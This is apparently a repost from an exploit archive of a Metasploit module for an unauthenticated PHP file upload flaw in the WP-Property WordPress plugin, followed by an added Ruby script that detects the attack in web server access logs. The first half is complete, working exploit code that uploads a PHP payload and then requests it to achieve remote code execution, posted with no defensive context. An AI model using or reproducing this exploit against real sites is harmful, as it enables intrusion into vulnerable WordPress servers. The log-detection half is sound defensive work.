WordPress WP-Property PHP File Upload Vulnerability

Posted on 2013-1-4 19:51:30
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def check
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end

Don't ask me what this is or how to use it. What I mean is: msf.
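
The module above sends a POST to uploadify.php and then requests a newly uploaded .php file from the same directory. The Ruby below is an added example (not part of the original post or of Metasploit) that finds that sequence in web server access logs. The Combined Log Format, the constructed sample log lines, and the names `parse_line` and `find_upload_then_exec` are assumptions made for this example.

```ruby
# Added example: flags "POST uploadify.php, then request a new .php beside it".
UPLOADIFY_DIR = '/wp-content/plugins/wp-property/third-party/uploadify/'
# Combined Log Format: ip ident user [time] "METHOD path PROTO" status ...
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3}) /

# Constructed sample log (documentation IP ranges, made-up file name).
SAMPLE_LOG = <<~LOG
  198.51.100.20 - - [04/Jan/2013:19:39:50 +0800] "GET /wordpress/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
  203.0.113.7 - - [04/Jan/2013:19:40:01 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 0 "-" "-"
  203.0.113.7 - - [04/Jan/2013:19:40:02 +0800] "POST /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 71 "-" "-"
  203.0.113.7 - - [04/Jan/2013:19:40:03 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/qWzRt.php HTTP/1.1" 200 0 "-" "-"
  198.51.100.20 - - [04/Jan/2013:19:41:10 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.css HTTP/1.1" 200 812 "-" "Mozilla/5.0"
LOG

def parse_line(line)
  m = LOG_RE.match(line)
  return nil unless m
  { ip: m[:ip], time: m[:time], method: m[:method],
    path: m[:path].split('?', 2).first, status: m[:status].to_i }
end

# Returns one alert per request for a non-uploadify .php file in the uploadify
# directory made by a client that earlier POSTed to uploadify.php with a 200.
# Covers only the upload directory used in the module above.
def find_upload_then_exec(log_text)
  uploaders = {} # ip => time of first successful POST to uploadify.php
  alerts = []
  log_text.each_line do |line|
    e = parse_line(line.chomp)
    next unless e
    idx = e[:path].index(UPLOADIFY_DIR)
    next unless idx
    rel = e[:path][(idx + UPLOADIFY_DIR.length)..-1]
    if e[:method] == 'POST' && rel == 'uploadify.php' && e[:status] == 200
      uploaders[e[:ip]] ||= e[:time]
    elsif rel =~ /\.php\z/i && rel != 'uploadify.php' && uploaders.key?(e[:ip])
      alerts << { ip: e[:ip], uploaded_at: uploaders[e[:ip]], script: e[:path], status: e[:status] }
    end
  end
  alerts
end

find_upload_then_exec(SAMPLE_LOG).each do |a|
  puts "ALERT #{a[:ip]} uploaded at #{a[:uploaded_at]}, then requested #{a[:script]} (#{a[:status]})"
end
```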